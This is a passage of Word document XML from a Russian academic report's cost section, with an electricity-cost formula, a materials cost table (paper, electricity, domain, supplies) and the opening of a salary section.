        <w:t xml:space="preserve"> бумагу, канцтовары, комплектующие, дополнительное оборудование, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C2D">
        <w:t xml:space="preserve">а также включаем расходы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55C16">
        <w:t xml:space="preserve">на электроэнергию, которые можно рассчитать по формуле </w:t>
      </w:r>
      <w:r w:rsidR="00AF064D">
        <w:t>10.</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F064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00F870DF" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="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AF064D" w:rsidRPr="00E55C16">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00AF064D" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E785D" w:rsidRPr="00B36C2D" w:rsidRDefault="001E785D" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B36C2D">
        <w:t xml:space="preserve">где </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>P</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00B36C2D">
        <w:t xml:space="preserve"> – потребляемая мощность оборудования, кВт/ч;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="00B36C2D" w:rsidRDefault="00F870DF" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:p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oMath>
      <w:r w:rsidR="001E785D" w:rsidRPr="00B36C2D">
        <w:t>– стоимость 1 кВт/ч, руб.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="00E55C16" w:rsidRDefault="00F870DF" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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B36C2D">
        <w:t>– время использования оборудования при проведении работ, ч.</w:t>
      </w:r>
      <w:r w:rsidR="001E785D" w:rsidRPr="001E785D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="00F870DF"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sz w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001354A0" w:rsidRDefault="001E785D" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">
        <w:t>Эти затраты определяются экспертным путем. Пример расчет</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>а расходов показан в таблице 18</w:t>
      </w:r>
      <w:r w:rsidRPr="001354A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="003843B4">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="008E62B2">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2469"/>
        <w:gridCol w:w="1497"/>
        <w:gridCol w:w="1631"/>
        <w:gridCol w:w="1688"/>
        <w:gridCol w:w="1575"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Материалы, покупные изделия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Единица измерения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Цена, руб./ед.изм.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Количество, ед.изм.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Стоимость, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00537692">
        <w:trPr>
          <w:trHeight w:val="64"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Бумага А4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Пачка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>235</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>235</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00537692">
        <w:trPr>
          <w:trHeight w:val="140"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="00F00AE0" w:rsidRDefault="00F870DF" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:tooltip="Флеш-память Transcend JetFlash 350 4 Gb USB 2.0 черная" w:history="1">
              <w:r w:rsidR="001E785D">
                <w:t>Электроэнергия</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>кВт/час</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="005B63A8" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>5,47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="00B36C2D" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>52,35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="005B63A8" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>286,4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00537692" w:rsidRPr="008E62B2" w:rsidTr="00537692">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00537692" w:rsidRPr="00537692" w:rsidRDefault="00537692" w:rsidP="00537692">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidTr="00537692">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00DC4AB9">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Материалы, покупные изделия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Единица измерения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Цена, руб./ед.изм.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Количество, ед.изм.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="008E62B2" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Стоимость, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:trHeight w:val="140"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Домен</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Штука</w:t>
            </w:r>
            <w:r>
              <w:t>/год</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>300</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>300</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Другие канцтовары</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="005B63A8" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>523,6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3898" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>Итого, С</w:t>
            </w:r>
            <w:r w:rsidRPr="008E62B2">
              <w:rPr>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>мат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="843" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001E785D" w:rsidRPr="008E62B2" w:rsidRDefault="001E785D" w:rsidP="00694A4F">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="008E62B2">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>345</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003843B4" w:rsidRPr="008E62B2" w:rsidTr="00677E44">
        <w:trPr>
          <w:trHeight w:val="230"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003843B4" w:rsidRPr="008E62B2" w:rsidRDefault="003843B4" w:rsidP="002B6996">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C23E72" w:rsidRPr="00C23E72" w:rsidRDefault="00C23E72" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc61505571"/>
      <w:r w:rsidRPr="0021747F">
        <w:t>Заработная плата исполнителей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00C23E72" w:rsidRDefault="00C23E72" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>К статье</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> «Заработная плата» относят </w:t>
      </w:r>
      <w:r>
        <w:t>оплату труда</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> научных, инженерно-технических и других работников</w:t>
      </w:r>
      <w:r>
        <w:t>, которые принимают участие</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> в разработке проекта. Расчёт ведётся по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00AF064D">
        <w:t xml:space="preserve"> 11</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">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F064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00F870DF" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:jc w:val="cente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AF064D">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00AF064D" w:rsidP="00AF064D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(11)</w:t>
            </w:r>
          </w:p>
